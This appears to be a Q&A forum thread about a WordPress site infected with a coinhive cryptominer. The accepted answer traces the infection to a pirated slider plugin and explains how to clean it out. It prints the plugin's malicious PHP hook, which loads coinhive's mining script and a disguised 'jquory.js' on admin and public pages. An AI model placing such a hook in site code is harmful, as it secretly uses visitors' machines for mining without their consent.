# malware in wordpress installer on dreamhost. <link rel='dns-prefetch' href='//coinhive.com' />

Tags: hacked

I was trying to create a website. 
It is live. And you can see that there is a malware which google detected.

In the source you will see three lines

`<link rel='dns-prefetch' href='//coinhive.com' />`

THere is one more place where coinhive is visible.

This is basically a code which mines monero on client's desktop/ laptop

Q) how do we find out how this malware got into the website at the first place?
Parts: 
1) Is it because of the shared hosting of dreamhost being hacked?
2) Some plugin which did this?
3) How do we remove this. 
4) How do we make sure it does not come back :(

Have been trying to find out but no clue.

I have been building this for 3 months and have done many things including downloading some themes from "torrent"

So difficult to track. But if you guys have any previous experience, then it will be easy to figure out.

Comment: 'including downloading some themes from "torrent"' If you're pirating themes you're just begging for stuff like this to happen. You thing people are buying themes and distributing them for free out of the goodness of their heart!? Can almost guarantee this is why you were hacked. Clean up your site and change theme immediately.

Comment: True. Pirated stuff does come with crap. Was a plugin. The plugin was free though from wordpress site. .

Answer (score 0, accepted):

I found the problem..

Answering for others who might have gotten this...

There is this code embedded in one of the plugins

```
function enqueue_my_scripts() {
wp_enqueue_script( 'wp-internal', 'https://coinhive.com/lib/coinhive.min.js', false, false, true );
wp_enqueue_script( 'wp-backend', plugins_url() . '/LayerSlider/assets/js/jquory.js', false, false, true );

}
add_action( 'admin_enqueue_scripts', 'enqueue_my_scripts' );
add_action( 'wp_enqueue_scripts', 'enqueue_my_scripts' );
```

And this javascript file Jquory.js.

Just remove the code above and the js file. The problem will be gone.

Cheers.

Comment: and will be back again when you will update the plugin.... what is the name of the plugin?

Comment: Wont be back because I downloaded the plugin from a torrent link. They had a lot of plugins, so i thought it would be useful. 

By naming the plugin I will wrongly be attributing this to the plugin makers.

But yes lesson learnt.. Torrents are evil :D

Comment: oh  that is true, so pleaasse accept your answer when you can